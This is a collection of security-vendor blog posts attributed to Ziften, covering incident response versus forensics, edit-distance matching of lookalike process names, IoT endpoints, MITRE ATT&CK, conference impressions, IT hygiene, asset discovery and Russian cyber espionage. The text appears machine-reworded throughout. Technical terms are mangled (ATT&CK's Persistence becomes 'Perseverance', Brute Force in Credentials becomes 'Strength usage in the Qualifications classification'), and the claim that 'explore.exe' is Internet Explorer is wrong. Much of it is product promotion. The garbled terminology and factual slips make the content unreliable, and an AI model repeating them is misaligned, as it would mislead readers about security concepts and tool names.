Understanding The Distinction Between Incident Response And Forensic Analysis – Charles Leaver

Written By Roark Pollock And Presented By Ziften CEO Charles Leaver


There might be a joke someplace regarding the forensic analyst that was late to the incident response celebration. There is the seed of a joke in the idea at least however obviously, you have to understand the distinctions between incident response and forensic analysis to appreciate the capacity for humor.

Forensic analysis and incident response are related disciplines that can utilize comparable tools and associated data sets however likewise have some crucial differences. There are four particularly important differences between forensic analysis and incident response:

– Goals.
– Data requirements.
– Group skills.
– Advantages.

The distinction in the goals of forensic analysis and incident response is perhaps the most crucial. Incident response is focused on figuring out a quick (i.e., near real time) reaction to an instant risk or concern. For instance, a home is on fire and the firefighters that show up to put that fire out are involved in incident response. Forensic analysis is typically performed as part of a scheduled compliance, legal discovery, or police investigation. For example, a fire detective may take a look at the remains of that house fire to determine the overall damage to the house, the reason for the fire, and whether the source was such that other houses are likewise facing the same risk. In other words, incident response is concentrated on containment of a danger or problem, while forensic analysis is concentrated on a full understanding and extensive removal of a breach.

A 2nd major distinction between the disciplines is the data resources required to attain the goals. Incident response teams normally only need short-term data sources, typically no greater than a month or so, while forensic analysis teams usually need much longer lived logs and files. Remember that the typical dwell time of an effective attack is somewhere between 150 and 300 days.

While there is commonness in the workers abilities of incident response and forensic analysis groups, and in fact incident response is often considered a subset of the border forensic discipline, there are essential distinctions in task requirements. Both kinds of research require strong log analysis and malware analysis capabilities. Incident response needs the ability to quickly isolate a contaminated device and to develop means to reconcile or quarantine the device. Interactions tend to be with other operations and security staff member. Forensic analysis generally requires interactions with a much broader set of departments, including compliance, HR, legal and operations.

Not remarkably, the perceived advantages of these activities also differ.

The ability to get rid of a risk on one device in near real-time is a significant determinate in keeping breaches isolated and restricted in impact. Incident response, and proactive danger searching, is the first defense line in security operations. Forensic analysis is incident responses’ less attractive relative. However, the benefits of this work are indisputable. A thorough forensic examination allows the removal of all dangers with the cautious analysis of an entire attack chain of events. Which is no laughing matter.

Do your endpoint security processes allow both instant incident response, and long-lasting historic forensic analysis?

Part 1 Of Using Edit Difference For Detection – Charles Leaver

Written By Jesse Sampson And Presented By Charles Leaver CEO Ziften


Why are the exact same techniques being used by enemies over and over? The basic answer is that they are still working today. For instance, Cisco’s 2017 Cybersecurity Report tells us that after years of wane, spam email with malicious attachments is once again on the rise. Because conventional attack vector, malware authors usually conceal their activities by using a filename just like a typical system process.

There is not always a connection between a file’s path name and its contents: anyone who has tried to conceal delicate details by providing it a dull name like “taxes”, or altered the extension of a file attachment to circumvent e-mail guidelines understands this principle. Malware authors understand this too, and will often name malware to resemble common system procedures. For instance, “explore.exe” is Internet Explorer, but “explorer.exe” with an extra “r” may be anything. It’s simple even for professionals to neglect this small difference.

The opposite issue, known.exe files running in uncommon places, is simple to fix, using SQL sets and string functions.


What about the other case, finding near matches to the executable name? The majority of people begin their search for near string matches by arranging data and visually searching for discrepancies. This typically works effectively for a small set of data, maybe even a single system. To discover these patterns at scale, nevertheless, requires an algorithmic approach. One established strategy for “fuzzy matching” is to utilize Edit Distance.

Exactly what’s the very best method to determining edit distance? For Ziften, our technology stack consists of HP Vertica, which makes this task easy. The internet has lots of data scientists and data engineers singing Vertica’s praises, so it will be sufficient to point out that Vertica makes it easy to develop custom-made functions that take full advantage of its power – from C++ power tools, to analytical modeling scalpels in R and Java.

This Git repo is kept by Vertica lovers operating in industry. It’s not a certified offering, but the Vertica team is definitely familiar with it, and furthermore is thinking everyday about ways to make Vertica better for data scientists – a great space to watch. Most importantly, it contains a function to determine edit distance! There are also some other tools for the natural processing of langauge here like word stemmers and tokenizers.

By utilizing edit distance on the leading executable paths, we can rapidly discover the closest match to each of our leading hits. This is an interesting dataset as we can arrange by distance to discover the closest matches over the entire data set, or we can sort by frequency of the top path to see what is the nearest match to our typically utilized processes. This data can also surface on contextual “report card” pages, to reveal, e.g. the leading five closest strings for a given path. Below is a toy example to provide a sense of use, based upon real data ZiftenLabs observed in a customer environment.


Setting a threshold of 0.2 appears to discover excellent results in our experience, however the point is that these can be adapted to fit individual use cases. Did we discover any malware? We notice that “teamviewer_.exe” (must be simply “teamviewer.exe”), “iexplorer.exe” (should be “iexplore.exe”), and “cvshost.exe” (must be svchost.exe, unless perhaps you work for CVS pharmacy…) all look weird. Considering that we’re already in our database, it’s likewise insignificant to get the associated MD5 hashes, Ziften suspicion ratings, and other attributes to do a deeper dive.


In this specific real-life environment, it turned out that teamviewer_.exe and iexplorer.exe were portable applications, not known malware. We assisted the client with more investigation on the user and system where we observed the portable applications because use of portable apps on a USB drive could be proof of naughty activity. The more troubling find was cvshost.exe. Ziften’s intelligence feeds indicate that this is a suspect file. Searching for the md5 hash for this file on VirusTotal verifies the Ziften data, indicating that this is a potentially major Trojan virus that may be a component of a botnet or doing something much more harmful. When the malware was discovered, however, it was simple to solve the problem and make sure it remains resolved using Ziften’s capability to kill and constantly block processes by MD5 hash.

Even as we develop sophisticated predictive analytics to identify harmful patterns, it is very important that we continue to improve our capabilities to hunt for known patterns and old tricks. Just because brand-new hazards emerge does not imply the old ones go away!

If you enjoyed this post, keep looking here for part 2 of this series where we will use this approach to hostnames to detect malware droppers and other malicious sites.

Increasing Numbers Of Connected Devices Will Present A Number Of Endpoint Challenges – Charles Leaver

Written By Roark Pollock And Presented By Ziften CEO Charles Leaver


It wasn’t long ago that everyone knew exactly what you meant if you raised the issue of an endpoint. If somebody wished to sell you an endpoint security solution, you understood exactly what devices that software was going to protect. But when I hear someone casually discuss endpoints today, The Princess Bride’s Inigo Montoya enters my mind: “You keep utilizing that word. I don’t believe it suggests what you believe it means.” Today an endpoint could be practically any type of device.

In truth, endpoints are so varied today that individuals have reverted to calling them “things.” According to Gartner at the end of 2016 there were over 6 billion “things” connected to the web. The consulting company forecasts that this number will grow to twenty one billion by the year 2020. Business uses of these things will be both generic (e.g. connected light bulbs and HVAC systems) and industry specific (e.g. oil rig security monitoring). For IT and security groups responsible for connecting and protecting endpoints, this is only half of the new difficulty, however. The acceptance of virtualization technology has actually redefined what an endpoint is, even in environments where these groups have generally run.

The last decade has seen a massive modification in the way end users gain access to information. Physical devices continue to be more mobile with many information employees now doing most of their computing and interaction on laptops and mobile phones. More significantly, everyone is becoming an info employee. Today, much better instrumentation and monitoring has permitted levels of data collection and analysis that can make the insertion of info-tech into practically any task successful.

At the same time, more traditional IT assets, especially servers, are becoming virtualized to remove a few of the traditional restrictions in having those assets tied to physical devices.

These two patterns together will impact security groups in essential ways. The totality of “endpoints” will consist of billions of long lived and unsecure IoT endpoints along with billions of virtual endpoint instances that will be scaled up and down as needed along with migrated to various physical places as needed.

Organizations will have really different concerns with these two general kinds of endpoints. Over their life times, IoT devices will need to be safeguarded from a host of risks some of which have yet to be dreamed up. Monitoring and safeguarding these devices will need advanced detection abilities. On the plus side, it will be possible to maintain distinct log data to make it possible for forensic examination.

Virtual endpoints, on the other hand, present their own important concerns. The ability to move their physical location makes it far more hard to guarantee right security policies are always attached to the endpoint. The practice of re-imaging virtual endpoints can make forensic investigation tough, as essential data is usually lost when a new image is used.

So no matter what word or phrases are used to describe your endpoints – endpoint, systems, client device, user device, mobile phone, server, virtual machine, container, cloud workload, IoT device, and so on – it is essential to understand precisely what someone suggests when they utilize the term endpoint.

Detection Is Crucial Post Compromise – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver CEO Ziften


If Avoidance Has Stopped working Then Detection Is Vital

The last scene in the well known Vietnam War film Platoon depicts a North Vietnamese Army regiment in a surprise night attack breaching the concertina wire border of an American Army battalion, overrunning it, and slaughtering the shocked protectors. The desperate company commander, comprehending their dire protective dilemma, orders his air support to strike his own position: “For the record, it’s my call – Dispose whatever you have actually got left on my position!” Minutes later on the battleground is immolated in a napalm hellscape.

Although physical dispute, this highlights 2 aspects of cybersecurity (1) You need to deal with inevitable perimeter breaches, and (2) It can be bloody hell if you do not discover early and react powerfully. MITRE Corporation has been leading the call for rebalancing cybersecurity priorities to place due focus on breach detection in the network interior instead of merely focusing on penetration prevention at the network perimeter. Instead of defense in depth, the latter produces a flawed “tootsie pop” defense – hard, crispy shell, soft chewy center. Writing in a MITRE blog, “We could see that it would not be a question of if your network will be breached however when it will be breached,” explains Gary Gagnon, MITRE’s senior vice president, director of cybersecurity, and primary security officer. “Today, organizations are asking ‘What length of time have the trespassers been within? How far have they gone?'”.

Some call this the “assumed breach” approach to cybersecurity, or as posted to Twitter by F-Secure’s Chief Research Officer:.

Q: How many of the Fortune 500 are compromised – Answer: 500.

This is based upon the likelihood that any sufficiently complicated cyber environment has an existing compromise, and that Fortune 500 enterprises are of magnificently complex scale.

Shift the Burden of Perfect Execution from the Defenders to the Attackers.

The standard cybersecurity viewpoint, originated from the legacy border defense model, has actually been that the assailant just has to be right one time, while the defender needs to be right all the time. An adequately resourced and relentless attacker will eventually achieve penetration. And time to successful penetration decreases with increasing size and complexity of the target business.

A border or prevention reliant cyber defense model basically demands ideal execution by the protector, while ceding success to any adequately sustained attack – a plan for particular cyber catastrophe. For example, a leading cybersecurity red team reports successful enterprise penetration in under 3 hours in greater than 90% of their client engagements – and these white hats are restricted to ethical ways. Your enterprise’s black hat opponents are not so constrained.

To be feasible, the cyber defense technique must turn the tables on the hackers, moving to them the unattainable burden of ideal execution. That is the reasoning for a strong detection capability that constantly monitors endpoint and network habits for any unusual indications or observed enemy footprints inside the boundary. The more sensitive the detection ability, the more care and stealth the hackers should exercise in committing their kill chain sequence, and the more time and labor and skill they must invest. The protectors need but observe a single assailant tramp to uncover their foot tracks and loosen up the attack kill chain. Now the protectors end up being the hunter, the hackers the hunted.

The MITRE ATT&CK Design.

MITRE provides a detailed taxonomy of hacker footprints, covering the post-compromise section of the kill chain, understood by the acronym ATT&CK, for Adversarial Tactics, Techniques, and Common Knowledge. ATT&CK project group leader Blake Strom says, “We chose to focus on the post attack period [portion of kill chain lined in orange below], not just because of the strong likelihood of a breach and the dearth of actionable information, but also because of the many opportunities and intervention points offered for efficient protective action that do not always rely on anticipation of adversary tools.”




As displayed in the MITRE figure above, the ATT&CK model offers additional granularity on the attack kill chain post compromise phases, breaking these out into 10 strategy classifications as shown. Each strategy classification is additionally detailed into a list of methods an attacker might utilize in carrying out that tactic. The January 2017 design update of the ATT&CK matrix lists 127 techniques throughout its ten strategy categories. For instance, Computer registry Run Keys/ Start Folder is a method in the Perseverance classification, Brute Force is a technique in the Credentials category, and Command-Line Interface is a technique in the Execution category.

Leveraging Endpoint Detection and Response (EDR) in the ATT&CK Design.

Endpoint Detection and Response (EDR) solutions, such as Ziften supplies, use vital visibility into attacker usage of strategies noted in the ATT&CK design. For instance, Computer system registry Run Keys/ Start Folder method use is reported, as is Command-Line Interface usage, since these both include easily observable endpoint behavior. Strength usage in the Qualifications classification must be blocked by design in each authentication architecture and be observable from the resulting account lockout. But even here the EDR product can report events such as failed login attempts, where an attacker might have a couple of guesses to attempt this, while staying under the account lockout attempt limit.

For mindful protectors, any method usage might be the attack giveaway that unravels the entire kill chain. EDR solutions compete based on their method observation, reporting, and signaling capabilities, in addition to their analytics capability to perform more of the attack pattern detection and kill chain reconstruction, in support of protecting security analysts staffing the enterprise SOC. Here at Ziften we will detail more of EDR solution capabilities in support of the ATT&CK post compromise detection design in future blog posts in this series.

The Buzz From RSA 2017 Is That Enterprises Demand Tailored Security Solutions – Charles Leaver

Written By Michael Vaughan And Presented By Charles Leaver Ziften CEO


More tailored products are required by security, network and operational groups in 2017

A number of us have actually participated in security conventions over the years, but none bring the same high level of enjoyment as RSA – where security is talked about by the world. Of all the conventions I have attended and worked, absolutely nothing comes close the passion for brand-new innovation people displayed this previous week in downtown San Francisco.

After taking a couple of days to digest the lots of discussions about the requirements and restrictions with existing security tech, Ihave actually been able to synthesize a particular theme amongguests: Individuals want personalized solutions that fit their environment and work well throughout several internal groups.

When I describe the term “individuals,” I mean everyone in attendance regardless of technological section. Operational professionals, security pros, network veterans, as well as user habits analysts frequented the Ziften booth and shared their stories with us.

Everybody seemed more prepared than ever to discuss their wants and needs for their environment. These guests had their own set of objectives they wanted to attain within their department and they were hungry for answers. Since the Ziften Zenith service offers such broad visibility on business devices, it’s not unexpected that our booth stayed crowded with individuals eager to read more about a brand-new, refreshingly easy endpoint security innovation.

Attendees featured grievances about myriad enterprise centric security concerns and looked for deeper insight into exactly what’s truly taking place on their network and on devices traveling in and out of the office.

End users of old-school security solutions are on the look
out for a more recent, more essential software.

If I could choose just one of the regular questions I received at RSA to share, it’s this one:

” What exactly is endpoint discovery?”

1) Endpoint discovery: Ziften exposes a historical view of unmanaged devices which have been connected to other business endpoints at some
time. Ziften allows users to find recognized and unidentified entities which are active or have actually been interactive with recognized endpoints.

a. Unmanaged Asset Discovery: Ziften utilizes our extension platform to
expose these unknown entities working on the network.

b. Extensions: These are custom-fit services customized to the user’s particular desires and requirements. The Ziften Zenith agent can execute the designated extension one time, on a schedule or on a continuous basis.

Almost always after the above explanation came the genuine factor they were going to:

People are looking for a large range of options for different departments, which includes executives. This is where working at Ziften makes answering this question a real treat.

Only a part of the RSA guests are security experts. I spoke with dozens of network, operation, endpoint management, vice presidents, general supervisors and channel partners.

They clearly all use and understand the need for quality security software however relatively find the translation to business worth missing out among security vendors.

NetworkWorld’s Charles Araujo phrased the problem quite well in a post last week:

Businesses must also rationalize security data in a service context and manage it holistically as part of the general IT and company operating design. A group of suppliers is likewise trying to tackle this challenge …

Ziften was among only three businesses mentioned.

After paying attention to those wants and needs of individuals from different business critical backgrounds and discussing to them the abilities of Ziften’s Extension platform, I typically explained how Ziften would regulate an extension to fulfill their need, or I gave them a short demo of an extension that would enable them to overcome a difficulty.

2) Extension Platform: Customized, actionable options.

a. SKO Silos: Extensions based on fit and need (operations, network, endpoint, etc).

b. Customized Requests: Require something you can’t see? We can fix that for you.

3) Boosted Forensics:

a. Security: Risk management, Danger Assessment, Vulnerabilities, Metadata that is suspicious.

b. Operations: Compliance, License Justification, Unmanaged Assets.

c. Network: Ingress/Egress IP motion, Domains, Volume metadata.

4) Visibility within the network– Not simply exactly what enters and goes out.

a. ZFlow: Lastly see the network traffic inside your enterprise.

Needless to say, everybody I talked to in our booth quickly comprehended the critical benefit of having a tool such as Ziften Zenith running in and throughout their business.

Forbes writer, Jason Bloomberg, said it best when he recently explained the future of enterprise security software and how all signs point toward Ziften blazing a trail:

Possibly the broadest interruption: suppliers are improving their ability to understand how bad actors act, and can thus take steps to prevent, identify or mitigate their malicious activities. In particular, today’s vendors understand the ‘Cyber Kill Chain’ – the actions a skilled, patient hacker (understood in the biz as an innovative persistent threat, or APT) will require to accomplish his/her nefarious objectives.

The product of U.S. Defense professional Lockheed Martin,
The Cyber Kill Chain contains seven links: reconnaissance, weaponization, shipment, exploitation, installation, developing command and control, and actions on objectives.

Today’s more ingenious vendors target several of these links, with the goal of avoiding, finding or mitigating the attack. Five suppliers at RSA stood apart in this category.

Ziften offers an agent based  technique to tracking the behavior of users, devices, applications, and network aspects, both in real time in addition to throughout historical data.

In real time, analysts utilize Ziften for hazard recognition and avoidance,
while they use the historic data to uncover steps in the kill chain for mitigation and forensic purposes.

Read This To Ensure That Operational Problems Do Not Become Security Issues – Charles Leaver

Written By Dr Al Hartmann And Presented By Ziften CEO Charles Leaver


Return to Essentials With Hygiene And Avoid Serious Problems

When you were a kid you will have been taught that brushing your teeth effectively and flossing will avoid the need for pricey crowns and root canal procedures. Basic health is way simpler and far cheaper than neglect and disease. This same lesson applies in the realm of enterprise IT – we can run a sound operation with correct endpoint and network hygiene, or we can deal with mounting security problems and disastrous data breaches as lax hygiene extracts its difficult toll.

Functional and Security Issues Overlap

Endpoint Detection and Response (EDR) tools like those we have created here at Ziften supply analytic insight into system operation across the enterprise endpoint population. They likewise supply endpoint-derived network operation insights that substantially broaden on wire visibility alone and extend into virtual and cloud environments. These insights benefit both security and operations groups in considerable ways, given the considerable overlap between functional and security issues:

On the security side, EDR tools offer critical situational awareness for event response. On the functional side, EDR tools provide vital endpoint visibility for functional control. Important situational awareness demands a baseline understanding of endpoint population running norms, which comprehending facilitates correct operational control.

Another method to explain these interdependencies is:

You cannot protect what you do not manage.
You cannot control what you don’t measure.
You can’t measure what you do not track.

Managing, measuring, and monitoring has as much to do with the security role as with the functional role, do not aim to split the child. Management indicates adherence to policy, that adherence must be measured, and operational measurements constitute a time series that must be tracked. A few sporadic measurements of important dynamic time series lacks interpretive context.

Tight security does not make up for lax management, nor does tight management compensate for lazy security. [Check out that once more for emphasis.] Mission execution imbalances here lead to unsustainable ineffectiveness and scale obstacles that inevitably cause significant security breaches and operational shortages.

Areas Of Overlap

Substantial overlaps between functional and security problems consist of:

Configuration hardening and basic images
The group policy
Application control and cloud management
Network division and management
Security of data and file encryption
Asset management and device restoration
Mobile device management
Log management
Backups and data restoration
Vulnerability and patch management
Identity management
Management of access
Employee continual cyber awareness training

For instance, asset management and device restore as well as backup and data restore are most likely operational group responsibilities, however they end up being significant security problems when ransomware sweeps the enterprise, bricking all devices (not just the typical endpoints, but any network connected devices such as printers, badge readers, security cams, network routers, medical imaging devices, commercial control systems, etc.). Exactly what would your business response time be to reflash and revitalize all device images from scratch and restore their data? Or is your contingency plan to immediately stuff the attackers’ Bitcoin wallets and hope they haven’t exfiltrated your data for further extortion and monetization. And why would you offload your data restoration obligation to a criminal syndicate, blindly trusting in their perfect data restoration integrity – makes absolutely zero sense. Operational control responsibility rests with the business, not with the opponents, and may not be shirked – shoulder your duty!

For another example, standard image construction using best practices setup hardening is clearly a joint responsibility of operations and security staff. In contrast to inefficient signature based endpoint protection platforms (EPP), which all large business breach victims have actually long had in place, setup hardening works, so bake it in and continuously revitalize it. Likewise consider the needs of business personnel whose job function needs opening of unsolicited email attachments, such as resumes, billings, legal notices, or other required files. This must be done in a cloistered virtual sandbox environment, not on your production endpoints. Security staff will make these decisions, however operations staff will be imaging the endpoints and supporting the workers. These are shared duties.

Example Of Overlap:

Use a safe environment to detonate. Do not utilize production endpoints for opening unsolicited but needed email files, like resumes, invoices, legal notices, and so on

Focus Limited Security Resources on the Tasks Only They Can Perform

A lot of big businesses are challenged to successfully staff all their security functions. Left unaddressed, deficiencies in functional efficiency will burn out security staff so quickly that security functions will constantly be understaffed. There won’t be enough fingers on your security group to jam in the increasing holes in the security dike that lax or inattentive endpoint or network or database management produces. And it will be less hard to staff operational roles than to staff security roles with gifted analysts.

Transfer routine formulaic activities to operations personnel. Focus restricted security resources on the jobs just they can carry out:

Security Operations Center (SOC) staffing
Preventative penetration screening and red teaming
Reactive occurrence response and forensics
Proactive attack searching (both insider and external).
Security oversight of overlapping functional functions (ensure existing security frame of mind).
Security policy advancement and stake holder buy-in.
Security architecture/tools/methodology design, selection, and development.

Impose disciplined operations management and focus limited security resources on vital security roles. Then your business might prevent letting operations concerns fester into security issues.

Buzz Established By Security Fabric At This Year’s Fortinet Accelerate Conference – Charles Leaver

Written By Josh Applebaum And Presented By Ziften CEO Charles Leaver

The Fortinet Accelerate 2017 conference was held recently in Las Vegas. Ziften has sponsored Fortinet’s yearly International Partner Conference for the second time, and it was a pleasure to be there! The energy at the show was palpable, and this was not due to the energy beverages you constantly see individuals carrying around in Las Vegas. The buzz and energy was contributed by an essential theme throughout the week: the Fortinet Security Fabric.

The premise of Fortinet’s Security Fabric is basic: take the disparate security “point items” that a company has released, and link them to utilize the deep intelligence each product has in their own security vault to supply a combined end to end security blanket over the whole organization. Though Fortinet is usually considered a network security business, their method to supplying a total security solution spans more than the traditional network to include endpoints, IoT devices, in addition to the cloud. By exposing APIs to the Fabric Ready partners as well as allowing the exchange of actionable risk intelligence, Fortinet is opening the door for a more collective strategy throughout the whole security industry.

It is revitalizing to see that Fortinet has the exact same beliefs as we have at Ziften, which is that the only way that we as a market are going to catch up to (and exceed) the hackers is through combination and cooperation across all reaches of security, despite which supplier provides each element of the total solution. This is not a problem we are going to resolve on our own, however rather one that will be solved through a combined method like the one set out by Fortinet with their Security Fabric. Ziften is proud to be an establishing member of Fortinet’s Fabric Ready Alliance program, integrating our special approach to endpoint security with Fortinet’s “think different” mindset of exactly what it suggests to incorporate and work together.

Throughout the week, Fortinet’s (really enthusiastic) channel partners had the chance to walk the program floor to see the incorporated solutions offered by the various innovation partners. Ziften showcased their integrations with Fortinet, containing the combination of our service with Fortinet’s FortiSandbox.

The Ziften solution collects unknown files from endpoints (clients or servers running OS X, Linux or Windows) and submits them to the FortiSandbox for analysis and detonation. Results are instantly fed back into Ziften for notifying, reporting, and (if possible) automated mitigation actions.

It was exciting to see that the Fortinet channel partners clearly got the worth of a Security Fabric approach. It was clear to them, along with Ziften, that the Security Fabric is not a marketing trick, however rather a genuine strategy assembled by, and led by, Fortinet. While this is only the beginning of Fortinet’s Security Fabric story, Ziften is delighted to collaborate with Fortinet and view the story continue to unfold!

2017 Will Bring Three Tiers Of Cyber Espionage – Charles Leaver

Written By Jesse Sampson And Presented By Ziften CEO Charles Leaver


There is a lot of debate at the moment about the hacking threat from Russia and it would be simple for security specialists to be excessively worried about cyber espionage. Since the objectives of any cyber espionage campaign dictate its targets, Ziften Labs can assist answer this concern by diving into the reasons why states perform these projects.

Last Friday, the 3 major United States intelligence agencies launched a detailed statement on the activities of Russia related to the 2016 United States elections: Examining the Activities of Russia and Intentions in Current United States Elections (Activities and Intentions). While some doubters stay unsure by the brand-new report, the threats recognized by the report that we cover in this post are engaging adequate to require examination and realistic countermeasures – in spite of the near impossibility of incontrovertibly identifying the source of the attack. Naturally, the main Russian position has actually been winking rejection of hacks.

“Normally these type of leakages occur not due to the fact that cyber criminals broke in, however, as any specialist will inform you, since someone just forgot the password or set the easy password 123456.” German Klimenko, Putin’s leading Web adviser

While agencies get criticized for bureaucratic language like “high confidence,” the considered rigor of instructions like Activities and Intents contrasts with the headline-friendly “1000% certainty” of a mathematically disinclined media hustler like Julian Assange.

Activities and Intentions is most perceptive when it locates the use of hacking and cyber espionage in “multifaceted” Russian doctrine:

” Moscow’s use of disclosures throughout the United States election was unmatched, but its influence campaign otherwise followed a longstanding Russia messaging strategy that blends concealed intelligence operations – such as cyber activity – with overt efforts by Russian Government agencies, state-funded media, third-party intermediaries, and paid social media users or “trolls.”

The report is weakest when assessing the motives behind the doctrine, a.k.a. method. Apart from some incantations about intrinsic Russian hostility to the liberal democratic order, it declares that:.

” Putin most likely wanted to reject Secretary Clinton because he has actually openly blamed her since 2011 for inciting mass protests against his regime in late 2011 and early 2012, and because he deeply resents comments he almost certainly viewed as disparaging him.”.

A more nuanced assessment of Russian inspiration and their cyber manifestations will assist us much better determine security strategy in this environment. Ziften Labs has determined three major tactical imperatives at work.

First, as Kissinger would say, through history “Russia came to see itself as a beleaguered outpost of civilization for which security could be found just through applying its absolute will over its next-door neighbors (52)”. US policy in the William Clinton era threatened this notion to the growth of NATO and dislocating financial interventions, maybe contributing to a Russian choice for a Trump presidency.

Russia has actually utilized cyberwarfare methods to secure its influence in previous Soviet areas (Estonia, 2007, Georgia, 2008, Ukraine, 2015).

Second, President Putin desires Russia to be a great force in geopolitics again. “Above all, we should acknowledge that the demise of the Soviet Union was a major geopolitical disaster of the century,” he said in 2005. Hacking identities of popular individuals in political, academic, defense, technology, and other institutions that operatives might leak to embarrassing or outrageous effect is a simple method for Russia to reject the US. The understanding that Russia can affect election results in the US with a keystroke calls into question the authenticity of US democracy, and muddles discussion around similar issues in Russia. With other prestige boosting efforts like pioneering the ceasefire talks in Syria (after leveling numerous cities), this technique could enhance Russia’s global profile.

Lastly, President Putin may harbor issues about his job security. In spite of very favorable election outcomes, in accordance with Activities and Intentions, protests in 2011 and 2012 still loom large in his mind. With several regimes altering in his neighborhood in the 2000s and 2010s (he said it was an “epidemic of disintegration”), some of which came about as a result of intervention by NATO and the United States, President Putin watches out for Western interventionists who wouldn’t mind a similar outcome in Russia. A collaborated campaign could assist challenge rivals and put the least aggressive candidates in power.

Due to these factors for Russian hacking, who are the most likely targets?

Due to the overarching goals of discrediting the legitimacy of the United States and NATO and assisting non interventionist candidates where possible, government agencies, particularly those with roles in elections are at greatest risk. So too are campaign agencies and other NGOs close to politics like think tanks. These have provided softer targets for hackers to access to sensitive info. This indicates that organizations with account info for, or access to, popular people whose details could result in humiliation or confusion for United States political, company, academic, and media institutions need to be extra careful.

The next tier of danger comprises crucial infrastructure. While recent Washington Post reports of a compromised US electrical grid ended up being overblown, Russia truly has hacked power grids and perhaps other parts of physical infrastructure like gas and oil. Beyond vital physical infrastructure, innovation, finance, telecoms, and media could be targeted as took place in Georgia and Estonia.

Lastly, although the intelligence agencies work over the past weeks has actually caught some heat for providing “apparent” suggestions, everybody really would gain from the pointers presented in the Homeland Security/FBI report, and in this blog about hardening your setup by Ziften’s Dr Al Hartmann. With significant elections coming up this year in critical NATO members the Netherlands, Germany and France, only one thing is guaranteed: it will be a busy year for Russian cyber operators and these recs should be a leading priority.

Your IT Security Starts With Asset Identification and Management – Charles Leaver

Written By Roark Pollock And Presented By Charles Leaver CEO Ziften


Trustworthy IT asset management and discovery can be a network and security admin’s best friend.

I don’t need to inform you the apparent; we all understand a great security program begins with an audit of all the devices linked to the network. However, maintaining an existing inventory of every linked device used by workers and service partners is challenging. Much more challenging is making sure that there are no connected un-managed assets.

What is an Unmanaged Asset?

Networks can have countless connected devices. These might consist of the following to name a few:

– User devices such as laptops, desktop PC’s, workstations, virtual desktop systems, bring your own devices (BYOD), smart phones, and tablet devices.

– Cloud and Data center devices such as servers, virtual machines (VM), orphaned VM’s, containers, and storage systems.

– Networking devices such as switches, load balancers, firewalls, switches, and WiFi access points.

– Other devices such as printers, and more just recently – Internet of things (IoT) devices.

Unfortunately, a number of these connected devices might be unidentified to IT, or not managed by IT group policies. These unidentified devices and those not handled by IT policies are described as “unmanaged assets.”

The number of unmanaged assets continues to increase for numerous companies. Ziften discovers that as many as 30% to 50% of all connected devices could be unmanaged assets in today’s business networks.

IT asset management tools are typically optimized to identify assets such as PCs, servers, load balancers, firewalls, and devices for storage utilized to deliver business applications to organization. Nevertheless, these management tools usually disregard assets not owned by the organization, such as BYOD endpoints, or user-deployed wireless access points. A lot more uncomfortable is that Gartner asserts in “Beyond BYOD to IoT, Your Business Network Access Policy Should Change”, that IoT devices have gone beyond staff members and guests as the most significant user of the enterprise network.1.

Gartner goes on to explain a new pattern that will introduce even more un-managed assets into the business environment – bring your own things (BYOT).

Essentially, staff members bringing items which were created for the clever home, into the office environment. Examples include smart power sockets, smart kettles, smart coffee makers, wise light bulbs, domestic sensors, wireless webcams, plant care sensors, environmental controls, and ultimately, home robotics. Many of these things will be brought in by staff looking to make their working environment more congenial. These “things” can pick up information, can be managed by apps, and can communicate with cloud services.1.

Why is it Essential to Identify Unmanaged Assets?

Quite simply, unmanaged assets develop IT and security blind spots. Mike Hamilton, SVP of Product at Ziften said, “Security starts with knowing exactly what physical and virtual devices are linked to the business network. But, BYOD, shadow IT, IoT, and virtualization are making that more tough.”.

These blind spots not just increase security and compliance threats, they can increase legal risk. Info retention policies designed to limit legal liability are not likely to be applied to electronically stored information consisted of on unapproved virtual, mobile and cloud assets.

Maintaining an updated inventory of the assets on your network is important to excellent security. It’s common sense; if you have no idea it exists, you cannot understand if it is protected. In fact, asset visibility is so crucial that it is a foundational part of the majority of info security infrastructures including:

– SANS Important Security Controls for reliable cyber defense: Developing an inventory of licensed and unauthorized devices is primary on the list.

– Council on CyberSecurity Vital Security Controls: Producing a stock of licensed and unapproved devices is the very first control in the focused list.

– NIST Info Security Constant Tracking for Federal Info Systems and Organizations – SP 800-137: Info security constant tracking is defined as preserving continuous awareness of info security, vulnerabilities, and threats to support organizational danger management decisions.

– ISO/IEC 27001 Info Management Security System Requirements: The standard needs that assets be clearly identified and a stock of very important assets be drawn up and preserved.

– Ziften’s Adaptive Security Structure: The very first pillar includes discovery of all your authorized and unapproved physical and virtual devices.

Considerations in Evaluating Asset Discovery Solutions.

There are multiple strategies utilized for asset discovery and network mapping, and each of the methods have benefits and downsides. While examining the myriad tools, keep these two essential considerations in mind:.

Continuous versus point-in-time.

Strong information security needs continuous asset identification no matter exactly what approach is used. Nevertheless, lots of scanning techniques used in asset discovery require time to finish, and are hence performed occasionally. The downside to point-in-time asset identification is that short-term systems might only be on the network for a short time. Therefore, it is extremely possible that these transient systems will not be found.

Some discovery methods can activate security notifications in network firewall software, invasion detection systems, or infection scanning tools. Because these methods can be disruptive, discovery is just executed at routine, point-in-time intervals.

There are, however, some asset discovery strategies that can be used continually to locate and recognize linked assets. Tools that provide constant monitoring for un-managed assets can provide much better unmanaged asset discovery results.

” Since passive detection runs 24 × 7, it will identify temporal assets that may only be sometimes and briefly linked to the network and can send out alerts when brand-new assets are identified.”.

Passive versus active.

Asset identification tools provide intelligence on all found assets including IP address, hostname, MAC address, device manufacturer, as well as the device type. This innovation helps operations teams quickly tidy up their environments, getting rid of rogue and unmanaged devices – even VM proliferation. However, these tools go about this intelligence gathering in a different way.

Tools that utilize active network scanning successfully probe the network to coax reactions from devices. These actions offer ideas that help identify and finger print the device. Active scanning periodically examines the network or a section of the network for devices that are connected to the network at the time of the scan.

Active scanning can normally supply more thorough analysis of vulnerabilities, malware detection, and configuration and compliance auditing. Nevertheless, active scanning is performed periodically because of its disruptive nature with security infrastructure. Regrettably, active scanning risks missing out on transient devices and vulnerabilities that occur in between scheduled scans.

Other tools utilize passive asset identification techniques. Because passive detection operates 24 × 7, it will discover temporal assets that may only be sometimes and briefly connected to the network and can send notifications when new assets are found.

In addition, passive discovery does not disturb sensitive devices on the network, such as commercial control systems, and enables visibility of Internet and cloud services being accessed from systems on the network. Further passive discovery methods prevent triggering notifications on security tools throughout the network.


